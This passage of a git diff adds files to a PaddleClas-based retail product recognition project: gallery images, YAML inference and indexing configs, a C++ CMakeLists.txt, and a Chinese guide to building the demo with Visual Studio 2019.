0000000..4eabe8b Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinruchakafeinatie.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinruchamoxiangnailv.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinruchamoxiangnailv.jpg new file mode 100644 index 0000000..558aa05 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinruchamoxiangnailv.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinruchanongxiangyuanwei.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinruchanongxiangyuanwei.jpg new file mode 100644 index 0000000..d9195d4 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinruchanongxiangyuanwei.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinrusuanjunsudaqipaoshui.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinrusuanjunsudaqipaoshui.jpg new file mode 100644 index 0000000..42962b4 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinrusuanjunsudaqipaoshui.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinsuanmeizhisudaqipaoshui.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinsuanmeizhisudaqipaoshui.jpg new file mode 100644 index 0000000..8c34e00 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinsuanmeizhisudaqipaoshui.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinwutangbaitaoweisudaqipaoshui.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinwutangbaitaoweisudaqipaoshui.jpg new file mode 100644 index 0000000..00f8110 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinwutangbaitaoweisudaqipaoshui.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinwutangqiamanjuweisudaqipaoshui.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinwutangqiamanjuweisudaqipaoshui.jpg new file mode 100644 index 0000000..77486c3 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinwutangqiamanjuweisudaqipaoshui.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinyinghuaputaosudaqipaoshui.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinyinghuaputaosudaqipaoshui.jpg new file mode 100644 index 0000000..849c84f Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinyinghuaputaosudaqipaoshui.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/index_update/id_map.pkl b/Smart_container/PaddleClas/dataset/retail/index_update/id_map.pkl new file mode 100644 index 0000000..0e83e6e Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/index_update/id_map.pkl differ diff --git a/Smart_container/PaddleClas/dataset/retail/index_update/vector.index b/Smart_container/PaddleClas/dataset/retail/index_update/vector.index new file mode 100644 index 0000000..52f2da7 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/index_update/vector.index differ diff --git a/Smart_container/PaddleClas/dataset/retail/test.jpg b/Smart_container/PaddleClas/dataset/retail/test.jpg new file mode 100644 index 0000000..b58e897 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/test.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/test1.jpg b/Smart_container/PaddleClas/dataset/retail/test1.jpg new file mode 100644 index 0000000..c96bc9e Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/test1.jpg differ diff --git a/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg b/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg new file mode 100644 index 0000000..8dc68b4 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg differ diff --git a/Smart_container/PaddleClas/deploy/__init__.py b/Smart_container/PaddleClas/deploy/__init__.py new file mode 100644 index 0000000..eb018c3 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/__init__.py @@ -0,0 +1 @@ +from . import utils diff --git a/Smart_container/PaddleClas/deploy/configs/build_product.yaml b/Smart_container/PaddleClas/deploy/configs/build_product.yaml new file mode 100644 index 0000000..77fe030 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/configs/build_product.yaml @@ -0,0 +1,36 @@ +Global: + rec_inference_model_dir: "/root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer" + batch_size: 32 + use_gpu: False + enable_mkldnn: True + cpu_num_threads: 1 + enable_benchmark: True + use_fp16: False + ir_optim: True + use_tensorrt: False + gpu_mem: 8000 + enable_profile: False + +RecPreProcess: + transform_ops: + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + +RecPostProcess: null + +# indexing engine config +IndexProcess: + index_method: "HNSW32" # supported: HNSW32, IVF, Flat + index_dir: "/root/Smart_container/PaddleClas/dataset/retail/index" + image_root: "/root/Smart_container/PaddleClas/dataset/retail" + data_file: "/root/Smart_container/PaddleClas/dataset/retail/data_update.txt" + index_operation: "new" # suported: "append", "remove", "new" + delimiter: "\t" + dist_type: "IP" + embedding_size: 512 diff --git a/Smart_container/PaddleClas/deploy/configs/inference_client.yaml b/Smart_container/PaddleClas/deploy/configs/inference_client.yaml new file mode 100644 index 0000000..475d957 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/configs/inference_client.yaml @@ -0,0 +1,55 @@ +Global: + infer_imgs: "/root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg" + det_inference_model_dir: "/root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer" + rec_inference_model_dir: "/root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer" + rec_nms_thresold: 0.05 + + batch_size: 1 + image_shape: [3, 640, 640] + threshold: 0.2 + max_det_results: 5 + labe_list: + - foreground + + # inference engine config + use_gpu: False + enable_mkldnn: True + cpu_num_threads: 1 + enable_benchmark: True + use_fp16: False + ir_optim: True + use_tensorrt: False + gpu_mem: 8000 + enable_profile: False + +DetPreProcess: + transform_ops: + - DetResize: + interp: 2 + keep_ratio: false + target_size: [640, 640] + - DetNormalizeImage: + is_scale: true + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + - DetPermute: {} +DetPostProcess: {} + +RecPreProcess: + transform_ops: + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + +RecPostProcess: null + +# indexing engine config +IndexProcess: + index_dir: "/root/Smart_container/PaddleClas/dataset/retail/index_update" + return_k: 5 + score_thres: 0.5 diff --git a/Smart_container/PaddleClas/deploy/configs/inference_cls.yaml b/Smart_container/PaddleClas/deploy/configs/inference_cls.yaml new file mode 100644 index 0000000..7954880 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/configs/inference_cls.yaml @@ -0,0 +1,33 @@ +Global: + infer_imgs: "./images/ILSVRC2012_val_00000010.jpeg" + inference_model_dir: "./models" + batch_size: 1 + use_gpu: True + enable_mkldnn: True + cpu_num_threads: 10 + enable_benchmark: True + use_fp16: False + ir_optim: True + use_tensorrt: False + gpu_mem: 8000 + enable_profile: False +PreProcess: + transform_ops: + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + channel_num: 3 + - ToCHWImage: +PostProcess: + main_indicator: Topk + Topk: + topk: 5 + class_id_map_file: "../ppcls/utils/imagenet1k_label_list.txt" + SavePreLabel: + save_dir: ./pre_label/ diff --git a/Smart_container/PaddleClas/deploy/configs/inference_det.yaml b/Smart_container/PaddleClas/deploy/configs/inference_det.yaml new file mode 100644 index 0000000..7180c59 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/configs/inference_det.yaml @@ -0,0 +1,33 @@ +Global: + infer_imgs: "./images/wangzai.jpg" + det_inference_model_dir: "./models/ppyolov2_r50vd_dcn_mainbody_v1.0_infer" + batch_size: 1 + image_shape: [3, 640, 640] + threshold: 0.2 + max_det_results: 1 + labe_list: + - foreground + + # inference engine config + use_gpu: True + enable_mkldnn: True + cpu_num_threads: 10 + enable_benchmark: True + use_fp16: False + ir_optim: True + use_tensorrt: False + gpu_mem: 8000 + enable_profile: False + +DetPreProcess: + transform_ops: + - DetResize: + interp: 2 + keep_ratio: false + target_size: [640, 640] + - DetNormalizeImage: + is_scale: true + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + - DetPermute: {} +DetPostProcess: {} diff --git a/Smart_container/PaddleClas/deploy/configs/inference_product.yaml b/Smart_container/PaddleClas/deploy/configs/inference_product.yaml new file mode 100644 index 0000000..f639cbb --- /dev/null +++ b/Smart_container/PaddleClas/deploy/configs/inference_product.yaml @@ -0,0 +1,55 @@ +Global: + infer_imgs: "/root/Smart_container/PaddleClas/dataset/retail/test1.jpg" + det_inference_model_dir: "/root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer" + rec_inference_model_dir: "/root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer" + rec_nms_thresold: 0.05 + + batch_size: 1 + image_shape: [3, 640, 640] + threshold: 0.2 + max_det_results: 100 + labe_list: + - foreground + + # inference engine config + use_gpu: False + enable_mkldnn: True + cpu_num_threads: 1 + enable_benchmark: True + use_fp16: False + ir_optim: True + use_tensorrt: False + gpu_mem: 8000 + enable_profile: False + +DetPreProcess: + transform_ops: + - DetResize: + interp: 2 + keep_ratio: false + target_size: [640, 640] + - DetNormalizeImage: + is_scale: true + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + - DetPermute: {} +DetPostProcess: {} + +RecPreProcess: + transform_ops: + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + +RecPostProcess: null + +# indexing engine config +IndexProcess: + index_dir: "/root/Smart_container/PaddleClas/dataset/retail/index_update" + return_k: 5 + score_thres: 0.5 diff --git a/Smart_container/PaddleClas/deploy/configs/inference_rec.yaml b/Smart_container/PaddleClas/deploy/configs/inference_rec.yaml new file mode 100644 index 0000000..5346510 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/configs/inference_rec.yaml @@ -0,0 +1,35 @@ +Global: + infer_imgs: "./images/wangzai.jpg" + rec_inference_model_dir: "./models/product_ResNet50_vd_aliproduct_v1.0_infer" + batch_size: 1 + image_shape: [3, 640, 640] + threshold: 0.5 + max_det_results: 1 + labe_list: + - foreground + + # inference engine config + use_gpu: False + enable_mkldnn: True + cpu_num_threads: 10 + enable_benchmark: True + use_fp16: False + ir_optim: True + use_tensorrt: False + gpu_mem: 8000 + enable_profile: False + +RecPreProcess: + transform_ops: + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + +RecPostProcess: null diff --git a/Smart_container/PaddleClas/deploy/cpp/CMakeLists.txt b/Smart_container/PaddleClas/deploy/cpp/CMakeLists.txt new file mode 100644 index 0000000..4b11eec --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/CMakeLists.txt @@ -0,0 +1,219 @@ +project(clas_system CXX C) +cmake_minimum_required(VERSION 3.14) + +option(WITH_MKL "Compile demo with MKL/OpenBlas support, default use MKL." ON) +option(WITH_GPU "Compile demo with GPU/CPU, default use CPU." OFF) +option(WITH_STATIC_LIB "Compile demo with static/shared library, default use static." ON) +option(WITH_TENSORRT "Compile demo with TensorRT." OFF) + +SET(PADDLE_LIB "" CACHE PATH "Location of libraries") +SET(OPENCV_DIR "" CACHE PATH "Location of libraries") +SET(CUDA_LIB "" CACHE PATH "Location of libraries") +SET(CUDNN_LIB "" CACHE PATH "Location of libraries") +SET(TENSORRT_DIR "" CACHE PATH "Compile demo with TensorRT") + +set(DEMO_NAME "clas_system") + +macro(safe_set_static_flag) + foreach(flag_var + CMAKE_CXX_FLAGS CMAKE_CXX_FLAGS_DEBUG CMAKE_CXX_FLAGS_RELEASE + CMAKE_CXX_FLAGS_MINSIZEREL CMAKE_CXX_FLAGS_RELWITHDEBINFO) + if(${flag_var} MATCHES "/MD") + string(REGEX REPLACE "/MD" "/MT" ${flag_var} "${${flag_var}}") + endif(${flag_var} MATCHES "/MD") + endforeach(flag_var) +endmacro() + +if (WITH_MKL) + ADD_DEFINITIONS(-DUSE_MKL) +endif() + +if(NOT DEFINED PADDLE_LIB) + message(FATAL_ERROR "please set PADDLE_LIB with -DPADDLE_LIB=/path/paddle/lib") +endif() + +if(NOT DEFINED OPENCV_DIR) + message(FATAL_ERROR "please set OPENCV_DIR with -DOPENCV_DIR=/path/opencv") +endif() + + +if (WIN32) + include_directories("${PADDLE_LIB}/paddle/fluid/inference") + include_directories("${PADDLE_LIB}/paddle/include") + link_directories("${PADDLE_LIB}/paddle/fluid/inference") + find_package(OpenCV REQUIRED PATHS ${OPENCV_DIR}/build/ NO_DEFAULT_PATH) + +else () + find_package(OpenCV REQUIRED PATHS ${OPENCV_DIR}/share/OpenCV NO_DEFAULT_PATH) + include_directories("${PADDLE_LIB}/paddle/include") + link_directories("${PADDLE_LIB}/paddle/lib") +endif () +include_directories(${OpenCV_INCLUDE_DIRS}) + +if (WIN32) + add_definitions("/DGOOGLE_GLOG_DLL_DECL=") + set(CMAKE_C_FLAGS_DEBUG "${CMAKE_C_FLAGS_DEBUG} /bigobj /MTd") + set(CMAKE_C_FLAGS_RELEASE "${CMAKE_C_FLAGS_RELEASE} /bigobj /MT") + set(CMAKE_CXX_FLAGS_DEBUG "${CMAKE_CXX_FLAGS_DEBUG} /bigobj /MTd") + set(CMAKE_CXX_FLAGS_RELEASE "${CMAKE_CXX_FLAGS_RELEASE} /bigobj /MT") + if (WITH_STATIC_LIB) + safe_set_static_flag() + add_definitions(-DSTATIC_LIB) + endif() +else() + set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -g -o3 -std=c++11") + set(CMAKE_STATIC_LIBRARY_PREFIX "") +endif() +message("flags" ${CMAKE_CXX_FLAGS}) + + +if (WITH_GPU) + if (NOT DEFINED CUDA_LIB OR ${CUDA_LIB} STREQUAL "") + message(FATAL_ERROR "please set CUDA_LIB with -DCUDA_LIB=/path/cuda-8.0/lib64") + endif() + if (NOT WIN32) + if (NOT DEFINED CUDNN_LIB) + message(FATAL_ERROR "please set CUDNN_LIB with -DCUDNN_LIB=/path/cudnn_v7.4/cuda/lib64") + endif() + endif(NOT WIN32) +endif() + +include_directories("${PADDLE_LIB}/third_party/install/protobuf/include") +include_directories("${PADDLE_LIB}/third_party/install/glog/include") +include_directories("${PADDLE_LIB}/third_party/install/gflags/include") +include_directories("${PADDLE_LIB}/third_party/install/xxhash/include") +include_directories("${PADDLE_LIB}/third_party/install/zlib/include") +include_directories("${PADDLE_LIB}/third_party/boost") +include_directories("${PADDLE_LIB}/third_party/eigen3") + +include_directories("${CMAKE_SOURCE_DIR}/") + +if (NOT WIN32) + if (WITH_TENSORRT AND WITH_GPU) + include_directories("${TENSORRT_DIR}/include") + link_directories("${TENSORRT_DIR}/lib") + endif() +endif(NOT WIN32) + +link_directories("${PADDLE_LIB}/third_party/install/zlib/lib") + +link_directories("${PADDLE_LIB}/third_party/install/protobuf/lib") +link_directories("${PADDLE_LIB}/third_party/install/glog/lib") +link_directories("${PADDLE_LIB}/third_party/install/gflags/lib") +link_directories("${PADDLE_LIB}/third_party/install/xxhash/lib") +link_directories("${PADDLE_LIB}/paddle/lib") + + +if(WITH_MKL) + include_directories("${PADDLE_LIB}/third_party/install/mklml/include") + if (WIN32) + set(MATH_LIB ${PADDLE_LIB}/third_party/install/mklml/lib/mklml.lib + ${PADDLE_LIB}/third_party/install/mklml/lib/libiomp5md.lib) + else () + set(MATH_LIB ${PADDLE_LIB}/third_party/install/mklml/lib/libmklml_intel${CMAKE_SHARED_LIBRARY_SUFFIX} + ${PADDLE_LIB}/third_party/install/mklml/lib/libiomp5${CMAKE_SHARED_LIBRARY_SUFFIX}) + execute_process(COMMAND cp -r ${PADDLE_LIB}/third_party/install/mklml/lib/libmklml_intel${CMAKE_SHARED_LIBRARY_SUFFIX} /usr/lib) + endif () + set(MKLDNN_PATH "${PADDLE_LIB}/third_party/install/mkldnn") + if(EXISTS ${MKLDNN_PATH}) + include_directories("${MKLDNN_PATH}/include") + if (WIN32) + set(MKLDNN_LIB ${MKLDNN_PATH}/lib/mkldnn.lib) + else () + set(MKLDNN_LIB ${MKLDNN_PATH}/lib/libmkldnn.so.0) + endif () + endif() +else() + if (WIN32) + set(MATH_LIB ${PADDLE_LIB}/third_party/install/openblas/lib/openblas${CMAKE_STATIC_LIBRARY_SUFFIX}) + else () + set(MATH_LIB ${PADDLE_LIB}/third_party/install/openblas/lib/libopenblas${CMAKE_STATIC_LIBRARY_SUFFIX}) + endif () +endif() + +# Note: libpaddle_inference_api.so/a must put before libpaddle_fluid.so/a +if(WITH_STATIC_LIB) + if(WIN32) + set(DEPS + ${PADDLE_LIB}/paddle/lib/paddle_inference${CMAKE_STATIC_LIBRARY_SUFFIX}) + else() + set(DEPS + ${PADDLE_LIB}/paddle/lib/libpaddle_inference${CMAKE_STATIC_LIBRARY_SUFFIX}) + endif() +else() + if(WIN32) + set(DEPS + ${PADDLE_LIB}/paddle/lib/paddle_inference${CMAKE_SHARED_LIBRARY_SUFFIX}) + else() + set(DEPS + ${PADDLE_LIB}/paddle/lib/libpaddle_inference${CMAKE_SHARED_LIBRARY_SUFFIX}) + endif() +endif(WITH_STATIC_LIB) + +if (NOT WIN32) + set(DEPS ${DEPS} + ${MATH_LIB} ${MKLDNN_LIB} + glog gflags protobuf z xxhash + ) + if(EXISTS "${PADDLE_LIB}/third_party/install/snappystream/lib") + set(DEPS ${DEPS} snappystream) + endif() + if (EXISTS "${PADDLE_LIB}/third_party/install/snappy/lib") + set(DEPS ${DEPS} snappy) + endif() +else() + set(DEPS ${DEPS} + ${MATH_LIB} ${MKLDNN_LIB} + glog gflags_static libprotobuf xxhash) + set(DEPS ${DEPS} libcmt shlwapi) + if (EXISTS "${PADDLE_LIB}/third_party/install/snappy/lib") + set(DEPS ${DEPS} snappy) + endif() + if(EXISTS "${PADDLE_LIB}/third_party/install/snappystream/lib") + set(DEPS ${DEPS} snappystream) + endif() +endif(NOT WIN32) + + +if(WITH_GPU) + if(NOT WIN32) + if (WITH_TENSORRT) + set(DEPS ${DEPS} ${TENSORRT_DIR}/lib/libnvinfer${CMAKE_SHARED_LIBRARY_SUFFIX}) + set(DEPS ${DEPS} ${TENSORRT_DIR}/lib/libnvinfer_plugin${CMAKE_SHARED_LIBRARY_SUFFIX}) + endif() + set(DEPS ${DEPS} ${CUDA_LIB}/libcudart${CMAKE_SHARED_LIBRARY_SUFFIX}) + set(DEPS ${DEPS} ${CUDNN_LIB}/libcudnn${CMAKE_SHARED_LIBRARY_SUFFIX}) + else() + set(DEPS ${DEPS} ${CUDA_LIB}/cudart${CMAKE_STATIC_LIBRARY_SUFFIX} ) + set(DEPS ${DEPS} ${CUDA_LIB}/cublas${CMAKE_STATIC_LIBRARY_SUFFIX} ) + set(DEPS ${DEPS} ${CUDNN_LIB}/cudnn${CMAKE_STATIC_LIBRARY_SUFFIX}) + endif() +endif() + + +if (NOT WIN32) + set(EXTERNAL_LIB "-ldl -lrt -lgomp -lz -lm -lpthread") + set(DEPS ${DEPS} ${EXTERNAL_LIB}) +endif() + +set(DEPS ${DEPS} ${OpenCV_LIBS}) + +include(FetchContent) +include(external-cmake/auto-log.cmake) +include_directories(${FETCHCONTENT_BASE_DIR}/extern_autolog-src) + +AUX_SOURCE_DIRECTORY(./src SRCS) +add_executable(${DEMO_NAME} ${SRCS}) + +target_link_libraries(${DEMO_NAME} ${DEPS}) + +if (WIN32 AND WITH_MKL) + add_custom_command(TARGET ${DEMO_NAME} POST_BUILD + COMMAND ${CMAKE_COMMAND} -E copy_if_different ${PADDLE_LIB}/third_party/install/mklml/lib/mklml.dll ./mklml.dll + COMMAND ${CMAKE_COMMAND} -E copy_if_different ${PADDLE_LIB}/third_party/install/mklml/lib/libiomp5md.dll ./libiomp5md.dll + COMMAND ${CMAKE_COMMAND} -E copy_if_different ${PADDLE_LIB}/third_party/install/mkldnn/lib/mkldnn.dll ./mkldnn.dll + COMMAND ${CMAKE_COMMAND} -E copy_if_different ${PADDLE_LIB}/third_party/install/mklml/lib/mklml.dll ./release/mklml.dll + COMMAND ${CMAKE_COMMAND} -E copy_if_different ${PADDLE_LIB}/third_party/install/mklml/lib/libiomp5md.dll ./release/libiomp5md.dll + COMMAND ${CMAKE_COMMAND} -E copy_if_different ${PADDLE_LIB}/third_party/install/mkldnn/lib/mkldnn.dll ./release/mkldnn.dll + ) +endif() diff --git a/Smart_container/PaddleClas/deploy/cpp/docs/imgs/ILSVRC2012_val_00000666.JPEG b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/ILSVRC2012_val_00000666.JPEG new file mode 100644 index 0000000..ebb5625 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/ILSVRC2012_val_00000666.JPEG differ diff --git a/Smart_container/PaddleClas/deploy/cpp/docs/imgs/cpp_infer_result.png b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/cpp_infer_result.png new file mode 100644 index 0000000..fe9de1a Binary files /dev/null and b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/cpp_infer_result.png differ diff --git a/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step1.png b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step1.png new file mode 100644 index 0000000..58fdf2f Binary files /dev/null and b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step1.png differ diff --git a/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step2.png b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step2.png new file mode 100644 index 0000000..f1b5fd0 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step2.png differ diff --git a/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step3.png b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step3.png new file mode 100644 index 0000000..cb1b2ae Binary files /dev/null and b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step3.png differ diff --git a/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step4.png b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step4.png new file mode 100644 index 0000000..5fc0408 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step4.png differ diff --git a/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step5.png b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step5.png new file mode 100644 index 0000000..fbb2e4c Binary files /dev/null and b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step5.png differ diff --git a/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step6.png b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step6.png new file mode 100644 index 0000000..86a8039 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step6.png differ diff --git a/Smart_container/PaddleClas/deploy/cpp/docs/windows_vs2019_build.md b/Smart_container/PaddleClas/deploy/cpp/docs/windows_vs2019_build.md new file mode 100644 index 0000000..6e2b370 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/docs/windows_vs2019_build.md @@ -0,0 +1,119 @@ +# Visual Studio 2019 Community CMake 编译指南 + +PaddleClas在Windows 平台下基于`Visual Studio 2019 Community` 进行了测试。微软从`Visual Studio 2017`开始即支持直接管理`CMake`跨平台编译项目,但是直到`2019`才提供了稳定和完全的支持,所以如果你想使用CMake管理项目编译构建,我们推荐使用`Visual Studio 2019`。如果您希望通过生成`sln解决方案`的方式进行编译,可以参考该文档:[https://zhuanlan.zhihu.com/p/145446681](https://zhuanlan.zhihu.com/p/145446681)。 + + +## 前置条件 +* Visual Studio 2019 +* CUDA 9.0 / CUDA 10.0,cudnn 7.6+ (仅在使用GPU版本的预测库时需要) +* CMake 3.0+ + +请确保系统已经正确安装并配置好上述基本软件,其中: + * 在安装`Visual Studio 2019`时,`工作负载`需要勾选`使用C++的桌面开发`; + * CUDA需要正确安装并设置系统环境变量; + * CMake需要正确安装并将路径添加到系统环境变量中。 + +以下测试基于`Visual Studio 2019 Community`版本。 + +**下面所有示例以工作目录为 `D:\projects`演示**。 + +### Step1: 下载PaddlePaddle C++ 预测库 paddle_inference_install_dir + +PaddlePaddle C++ 预测库针对不同的`CPU`和`CUDA`版本提供了不同的预编译版本,请根据实际情况下载: [C++预测库下载列表](https://www.paddlepaddle.org.cn/documentation/docs/zh/develop/guides/05_inference_deployment/inference/windows_cpp_inference.html)。 + +解压后`D:\projects\paddle_inference_install_dir`目录包含内容为: + +``` +paddle_inference_install_dir +├── paddle # paddle核心库和头文件 +| +├── third_party # 第三方依赖库和头文件 +| +└── version.txt # 版本和编译信息 +``` + +然后需要将`Paddle预测库`的路径`D:\projects\paddle_inference_install_dir\paddle\lib`添加到系统环境变量`Path`中。 + +### Step2: 安装配置OpenCV + +1. 在OpenCV官网下载适用于Windows平台的3.4.6版本, [下载地址](https://sourceforge.net/projects/opencvlibrary/files/3.4.6/opencv-3.4.6-vc14_vc15.exe/download) +2. 运行下载的可执行文件,将OpenCV解压至指定目录,如`D:\projects\opencv` +3. 配置环境变量,如下流程所示 + - 此电脑(我的电脑)-> 属性 -> 高级系统设置 -> 环境变量 + - 在系统变量中找到Path(如没有,自行创建),并双击编辑 + - 新建,将OpenCV路径填入并保存,如 `D:\projects\opencv\build\x64\vc14\bin` + +### Step3: 使用Visual Studio 2019直接编译CMake + +1. 打开Visual Studio 2019 Community,点击 `继续但无需代码` + +![step2](./imgs/vs2019_step1.png) + +2. 点击: `文件`->`打开`->`CMake` + +![step2.1](./imgs/vs2019_step2.png) + +选择项目代码所在路径,并打开`CMakeList.txt`: + +![step2.2](./imgs/vs2019_step3.png) + +3. 点击:`项目`->`cpp_inference_demo的CMake设置` + +![step3](./imgs/vs2019_step4.png) + +4. 请设置以下参数的值 + + +| 名称 | 值 | 保存到 JSON | +| ----------------------------- | ------------------ | ----------- | +| CMAKE_BACKWARDS_COMPATIBILITY | 3.17 | [√] | +| CMAKE_BUILD_TYPE | RelWithDebInfo | [√] | +| CUDA_LIB | CUDA的库路径 | [√] | +| CUDNN_LIB | CUDNN的库路径 | [√] | +| OpenCV_DIR | OpenCV的安装路径 | [√] | +| PADDLE_LIB | Paddle预测库的路径 | [√] | +| WITH_GPU | [√] | [√] | +| WITH_MKL | [√] | [√] | +| WITH_STATIC_LIB | [√] | [√] | + +**注意**: + +1. `CMAKE_BACKWARDS_COMPATIBILITY` 的值请根据自己 `cmake` 版本设置,`cmake` 版本可以通过命令:`cmake --version` 查询; +2. `CUDA_LIB` 、 `CUDNN_LIB` 的值仅需在使用**GPU版本**预测库时指定,其中CUDA库版本尽量对齐,**使用9.0、10.0版本,不使用9.2、10.1等版本CUDA库**; +3. 在设置 `CUDA_LIB`、`CUDNN_LIB`、`OPENCV_DIR`、`PADDLE_LIB` 时,点击 `浏览`,分别设置相应的路径; + * `CUDA_LIB`和`CUDNN_LIB`:该路径取决于CUDA与CUDNN的安装位置。 + * `OpenCV_DIR`:该路径下需要有`.cmake`文件,一般为`opencv/build/`; + * `PADDLE_LIB`:该路径下需要有`CMakeCache.txt`文件,一般为`paddle_inference_install_dir/`。 +4. 在使用 `CPU` 版预测库时,请不要勾选 `WITH_GPU` - `保存到 JSON`。 + +![step4](./imgs/vs2019_step5.png) + +**设置完成后**, 点击上图中 `保存并生成CMake缓存以加载变量` 。 + +5. 点击`生成`->`全部生成` + +![step6](./imgs/vs2019_step6.png) + + +### Step4: 预测及可视化 + +在完成上述操作后,`Visual Studio 2019` 编译产出的可执行文件 `clas_system.exe` 在 `out\build\x64-Release`目录下,打开`cmd`,并切换到该目录: + +``` +cd D:\projects\PaddleClas\deploy\cpp_infer\out\build\x64-Release +``` +可执行文件`clas_system.exe`即为编译产出的的预测程序,其使用方法如下: + +```shell +.\clas_system.exe D:\projects\PaddleClas\deploy\cpp_infer\tools\config.txt .\docs\ILSVRC2012_val_00008306.JPEG +``` + +上述命令中,第一个参数(`D:\projects\PaddleClas\deploy\cpp_infer\tools\config.txt`)为配置文件路径,第二个参数(`.\docs\ILSVRC2012_val_00008306.JPEG`)为需要预测的图片路径。 + +注意,需要在配置文件中正确设置预测参数,包括所用模型文件的路径(`cls_model_path`和`cls_params_path`)。 + + +### 注意 +* 在Windows下的终端中执行文件exe时,可能会发生乱码的现象,此时需要在终端中输入`CHCP 65001`,将终端的编码方式由GBK编码(默认)改为UTF-8编码,更加具体的解释可以参考这篇博客:[https://blog.csdn.net/qq_35038153/article/details/78430359](https://blog.csdn.net/qq_35038153/article/details/78430359)。 +* 